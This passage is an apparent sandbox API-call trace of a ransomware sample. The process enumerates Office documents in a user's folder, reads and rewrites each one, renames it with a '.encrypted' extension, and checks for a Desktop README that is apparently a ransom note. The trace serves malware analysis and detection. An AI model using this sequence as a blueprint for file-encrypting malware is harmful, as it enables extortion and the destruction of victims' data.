ftLastAccessTime.dwLowDateTime=0x63227650, ftLastAccessTime.dwHighDateTime=0x1d5e0ab, ftLastWriteTime.dwLowDateTime=0x63227650, ftLastWriteTime.dwHighDateTime=0x1d5e0ab, nFileSizeHigh=0x0, nFileSizeLow=0x1d84, dwReserved0=0x0, dwReserved1=0x0, cFileName="QnhpLmLhHkmJWB.xlsx", cAlternateFileName="QNHPLM~1.XLS")) returned 1 [0151.435] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71e37940, ftCreationTime.dwHighDateTime=0x1d565a5, ftLastAccessTime.dwLowDateTime=0x57392da0, ftLastAccessTime.dwHighDateTime=0x1d5b08d, ftLastWriteTime.dwLowDateTime=0x57392da0, ftLastWriteTime.dwHighDateTime=0x1d5b08d, nFileSizeHigh=0x0, nFileSizeLow=0xa216, dwReserved0=0x0, dwReserved1=0x0, cFileName="U6is7p61GHkLJ3_.docx", cAlternateFileName="U6IS7P~1.DOC")) returned 1 [0151.435] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x630d78c0, ftCreationTime.dwHighDateTime=0x1d59fb2, ftLastAccessTime.dwLowDateTime=0xcc72acf0, ftLastAccessTime.dwHighDateTime=0x1d572a7, ftLastWriteTime.dwLowDateTime=0xcc72acf0, ftLastWriteTime.dwHighDateTime=0x1d572a7, nFileSizeHigh=0x0, nFileSizeLow=0x12921, dwReserved0=0x0, dwReserved1=0x0, cFileName="vjiQ_cpSzI_lE09.docx", cAlternateFileName="VJIQ_C~1.DOC")) returned 1 [0151.435] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a0ac50, ftCreationTime.dwHighDateTime=0x1d5bbf6, ftLastAccessTime.dwLowDateTime=0x667b4790, ftLastAccessTime.dwHighDateTime=0x1d58be3, ftLastWriteTime.dwLowDateTime=0x667b4790, ftLastWriteTime.dwHighDateTime=0x1d58be3, nFileSizeHigh=0x0, nFileSizeLow=0x160fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="VzbTJtSh2.xlsx", cAlternateFileName="VZBTJT~1.XLS")) returned 1 [0151.435] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x651eff10, ftCreationTime.dwHighDateTime=0x1d5e58c, ftLastAccessTime.dwLowDateTime=0x96b16bc0, ftLastAccessTime.dwHighDateTime=0x1d5e489, ftLastWriteTime.dwLowDateTime=0x96b16bc0, ftLastWriteTime.dwHighDateTime=0x1d5e489, nFileSizeHigh=0x0, nFileSizeLow=0x18b4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="wkIoRTbVM.docx", cAlternateFileName="WKIORT~1.DOC")) returned 1 [0151.436] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69c17d40, ftCreationTime.dwHighDateTime=0x1d5e127, ftLastAccessTime.dwLowDateTime=0xd081d6c0, ftLastAccessTime.dwHighDateTime=0x1d5e78e, ftLastWriteTime.dwLowDateTime=0xd081d6c0, ftLastWriteTime.dwHighDateTime=0x1d5e78e, nFileSizeHigh=0x0, nFileSizeLow=0xa694, dwReserved0=0x0, dwReserved1=0x0, cFileName="X5Fh3VEi-d94zoqNP.pptx", cAlternateFileName="X5FH3V~1.PPT")) returned 1 [0151.436] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa389e780, ftCreationTime.dwHighDateTime=0x1d5dc61, ftLastAccessTime.dwLowDateTime=0xc6cbf380, ftLastAccessTime.dwHighDateTime=0x1d5da88, ftLastWriteTime.dwLowDateTime=0xc6cbf380, ftLastWriteTime.dwHighDateTime=0x1d5da88, nFileSizeHigh=0x0, nFileSizeLow=0x1233, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZxmGTONw7B.doc", cAlternateFileName="ZXMGTO~1.DOC")) returned 1 [0151.436] FindNextFileW (in: hFindFile=0x777e58, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa389e780, ftCreationTime.dwHighDateTime=0x1d5dc61, ftLastAccessTime.dwLowDateTime=0xc6cbf380, ftLastAccessTime.dwHighDateTime=0x1d5da88, ftLastWriteTime.dwLowDateTime=0xc6cbf380, ftLastWriteTime.dwHighDateTime=0x1d5da88, nFileSizeHigh=0x0, nFileSizeLow=0x1233, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZxmGTONw7B.doc", cAlternateFileName="ZXMGTO~1.DOC")) returned 0 [0151.436] FindClose (in: hFindFile=0x777e58 | out: hFindFile=0x777e58) returned 1 [0151.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee8b8) returned 1 [0151.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee8c4) returned 1 [0151.458] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-60II61Ak.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-60II61Ak.xlsx", lpFilePart=0x0) returned 0x36 [0151.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0151.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-60II61Ak.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-60ii61ak.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0151.460] GetFileType (hFile=0x498) returned 0x1 [0151.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0151.460] GetFileType (hFile=0x498) returned 0x1 [0151.460] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x2d01 [0151.460] ReadFile (in: hFile=0x498, lpBuffer=0x2284f04, nNumberOfBytesToRead=0x2d01, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x2284f04*, lpNumberOfBytesRead=0x2ee894*=0x2d01, lpOverlapped=0x0) returned 1 [0151.461] CloseHandle (hObject=0x498) returned 1 [0151.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x2ee29c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0151.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x2ee300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0151.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee760) returned 1 [0151.483] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x2ee7dc | out: lpFileInformation=0x2ee7dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0151.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee75c) returned 1 [0151.705] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x2ee4ec | out: pfEnabled=0x2ee4ec) returned 0x0 [0151.819] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0151.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0151.819] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0151.819] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-60II61Ak.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-60II61Ak.xlsx", lpFilePart=0x0) returned 0x36 [0151.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0151.819] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-60II61Ak.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-60ii61ak.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4cc [0151.821] GetFileType (hFile=0x4cc) returned 0x1 [0151.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0151.821] GetFileType (hFile=0x4cc) returned 0x1 [0151.821] WriteFile (in: hFile=0x4cc, lpBuffer=0x2309fb4*, nNumberOfBytesToWrite=0x2d10, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x2309fb4*, lpNumberOfBytesWritten=0x2ee884*=0x2d10, lpOverlapped=0x0) returned 1 [0151.822] CloseHandle (hObject=0x4cc) returned 1 [0151.823] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-60II61Ak.xlsx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-60II61Ak.xlsx", lpFilePart=0x0) returned 0x36 [0151.824] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-60II61Ak.xlsx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-60II61Ak.xlsx.encrypted", lpFilePart=0x0) returned 0x40 [0151.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0151.824] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-60II61Ak.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-60ii61ak.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa3d23d0, ftCreationTime.dwHighDateTime=0x1d58c7a, ftLastAccessTime.dwLowDateTime=0x1f872b00, ftLastAccessTime.dwHighDateTime=0x1d5a1f1, ftLastWriteTime.dwLowDateTime=0x4174e8c0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x2d10)) returned 1 [0151.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0151.825] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-60II61Ak.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-60ii61ak.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-60II61Ak.xlsx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-60ii61ak.xlsx.encrypted")) returned 1 [0151.828] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3JvcF.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3JvcF.xlsx", lpFilePart=0x0) returned 0x32 [0151.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0151.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3JvcF.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3jvcf.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4cc [0151.828] GetFileType (hFile=0x4cc) returned 0x1 [0151.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0151.828] GetFileType (hFile=0x4cc) returned 0x1 [0151.828] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0xbc5f [0151.829] ReadFile (in: hFile=0x4cc, lpBuffer=0x230d1ac, nNumberOfBytesToRead=0xbc5f, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x230d1ac*, lpNumberOfBytesRead=0x2ee894*=0xbc5f, lpOverlapped=0x0) returned 1 [0151.830] CloseHandle (hObject=0x4cc) returned 1 [0151.871] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0151.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0151.871] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.871] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0151.871] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3JvcF.xlsx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3JvcF.xlsx", lpFilePart=0x0) returned 0x32 [0151.871] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0151.871] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3JvcF.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3jvcf.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4cc [0151.872] GetFileType (hFile=0x4cc) returned 0x1 [0151.872] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0151.872] GetFileType (hFile=0x4cc) returned 0x1 [0151.872] WriteFile (in: hFile=0x4cc, lpBuffer=0x237d490*, nNumberOfBytesToWrite=0xbc60, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x237d490*, lpNumberOfBytesWritten=0x2ee884*=0xbc60, lpOverlapped=0x0) returned 1 [0151.874] CloseHandle (hObject=0x4cc) returned 1 [0151.875] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3JvcF.xlsx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3JvcF.xlsx", lpFilePart=0x0) returned 0x32 [0151.875] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3JvcF.xlsx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3JvcF.xlsx.encrypted", lpFilePart=0x0) returned 0x3c [0151.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0151.876] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3JvcF.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3jvcf.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fd76690, ftCreationTime.dwHighDateTime=0x1d5d008, ftLastAccessTime.dwLowDateTime=0x456122f0, ftLastAccessTime.dwHighDateTime=0x1d55e0c, ftLastWriteTime.dwLowDateTime=0x417e6e40, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0xbc60)) returned 1 [0151.876] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0151.876] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3JvcF.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3jvcf.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3JvcF.xlsx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3jvcf.xlsx.encrypted")) returned 1 [0151.877] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8WUYgnmVVQsOHl.pptx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8WUYgnmVVQsOHl.pptx", lpFilePart=0x0) returned 0x3b [0151.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0151.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8WUYgnmVVQsOHl.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8wuygnmvvqsohl.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4cc [0151.878] GetFileType (hFile=0x4cc) returned 0x1 [0151.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0151.878] GetFileType (hFile=0x4cc) returned 0x1 [0151.878] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0x3903 [0151.878] ReadFile (in: hFile=0x4cc, lpBuffer=0x23895e8, nNumberOfBytesToRead=0x3903, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x23895e8*, lpNumberOfBytesRead=0x2ee894*=0x3903, lpOverlapped=0x0) returned 1 [0151.880] CloseHandle (hObject=0x4cc) returned 1 [0151.897] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0151.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0151.897] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.897] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0151.897] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8WUYgnmVVQsOHl.pptx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8WUYgnmVVQsOHl.pptx", lpFilePart=0x0) returned 0x3b [0151.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0151.897] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8WUYgnmVVQsOHl.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8wuygnmvvqsohl.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4cc [0151.898] GetFileType (hFile=0x4cc) returned 0x1 [0151.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7c4) returned 1 [0151.898] GetFileType (hFile=0x4cc) returned 0x1 [0151.898] WriteFile (in: hFile=0x4cc, lpBuffer=0x23e80e8*, nNumberOfBytesToWrite=0x3910, lpNumberOfBytesWritten=0x2ee884, lpOverlapped=0x0 | out: lpBuffer=0x23e80e8*, lpNumberOfBytesWritten=0x2ee884*=0x3910, lpOverlapped=0x0) returned 1 [0151.900] CloseHandle (hObject=0x4cc) returned 1 [0151.900] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8WUYgnmVVQsOHl.pptx", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8WUYgnmVVQsOHl.pptx", lpFilePart=0x0) returned 0x3b [0151.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8WUYgnmVVQsOHl.pptx.encrypted", nBufferLength=0x105, lpBuffer=0x2ee40c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8WUYgnmVVQsOHl.pptx.encrypted", lpFilePart=0x0) returned 0x45 [0151.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee86c) returned 1 [0151.901] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8WUYgnmVVQsOHl.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8wuygnmvvqsohl.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2ee8e8 | out: lpFileInformation=0x2ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x719de1a0, ftCreationTime.dwHighDateTime=0x1d5d049, ftLastAccessTime.dwLowDateTime=0xcc966530, ftLastAccessTime.dwHighDateTime=0x1d5b1ab, ftLastWriteTime.dwLowDateTime=0x4180cfa0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x3910)) returned 1 [0151.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee868) returned 1 [0151.901] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8WUYgnmVVQsOHl.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8wuygnmvvqsohl.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8WUYgnmVVQsOHl.pptx.encrypted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8wuygnmvvqsohl.pptx.encrypted")) returned 1 [0151.902] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9BNDTe04t.docx", nBufferLength=0x105, lpBuffer=0x2ee2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9BNDTe04t.docx", lpFilePart=0x0) returned 0x36 [0151.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7e0) returned 1 [0151.902] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9BNDTe04t.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9bndte04t.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4cc [0151.906] GetFileType (hFile=0x4cc) returned 0x1 [0151.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7dc) returned 1 [0151.906] GetFileType (hFile=0x4cc) returned 0x1 [0151.906] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x2ee8e8 | out: lpFileSizeHigh=0x2ee8e8*=0x0) returned 0xd9da [0151.907] ReadFile (in: hFile=0x4cc, lpBuffer=0x23ebf18, nNumberOfBytesToRead=0xd9da, lpNumberOfBytesRead=0x2ee894, lpOverlapped=0x0 | out: lpBuffer=0x23ebf18*, lpNumberOfBytesRead=0x2ee894*=0xd9da, lpOverlapped=0x0) returned 1 [0151.909] CloseHandle (hObject=0x4cc) returned 1 [0151.974] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0151.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee860) returned 1 [0151.974] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee8dc | out: lpFileInformation=0x2ee8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee85c) returned 1 [0151.974] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9BNDTe04t.docx", nBufferLength=0x105, lpBuffer=0x2ee2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9BNDTe04t.docx", lpFilePart=0x0) returned 0x36 [0151.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7c8) returned 1 [0151.975] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9BNDTe04t.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\9bndte04t.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 